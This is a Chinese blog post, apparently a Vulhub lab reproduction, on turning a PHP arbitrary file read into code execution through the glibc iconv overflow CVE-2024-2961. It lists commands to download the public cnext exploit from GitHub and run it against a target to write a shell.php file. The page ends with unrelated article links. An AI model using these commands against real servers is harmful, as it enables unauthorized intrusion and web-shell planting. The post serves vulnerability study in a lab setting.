vulhub中PHP利用GNU C Iconv将文件读取变成RCE(CVE-2024-2961)

余生有个小酒馆2024-06-02 9:10

GNU C 是一个标准的ISO C依赖库。在GNU C中,iconv()函数2.39及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。

如果一个PHP应用中存在任意文件读取漏洞,攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞,将其提升为代码执行漏洞。

漏洞复现

在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前,你需要准备一个Linux环境和Python 3.10解释器。

安装依赖:

pip install pwntools

pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip

然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py\>下载POC并执行:

wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py

python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"

已经成功写入shell.php:

相关推荐
一个处女座的程序猿O(∩_∩)O8 分钟前
Python函数参数*args和**kwargs完全指南:从入门到精通
开发语言·python
与衫14 分钟前
如何将SQLFlow工具产生的血缘导入到Datahub平台中
java·开发语言·数据库
m0_5312371718 分钟前
C语言-分支与循环语句练习
c语言·开发语言
сокол19 分钟前
【网安-Web渗透测试-漏洞系列】XXE漏洞
xml·web安全·php
Never_Satisfied20 分钟前
在JavaScript / HTML中,在html的元素中寻找第X个某元素
开发语言·javascript·html
好家伙VCC24 分钟前
**发散创新:编译器优化实战——从LLVM IR到性能飞跃的奇妙旅程**
java·开发语言·python·算法
游乐码25 分钟前
c#成员属性
开发语言·c#
Anastasiozzzz30 分钟前
如何理解AOP?带你写一个!
java·开发语言
大尚来也30 分钟前
Python 中使用 ezdxf:轻松读写 DXF 文件的完整指南
开发语言·python
热门推荐
01从零搭建一个 PHP 登录注册系统(含完整源码)02GitHub 镜像站点03使用 1panel面板 部署 php网站04MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法05openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南06AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot07让你的代码更整洁:10 个必知的 Kotlin 扩展函数08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解10openclaw 配置飞书 报错 应用未建立长连接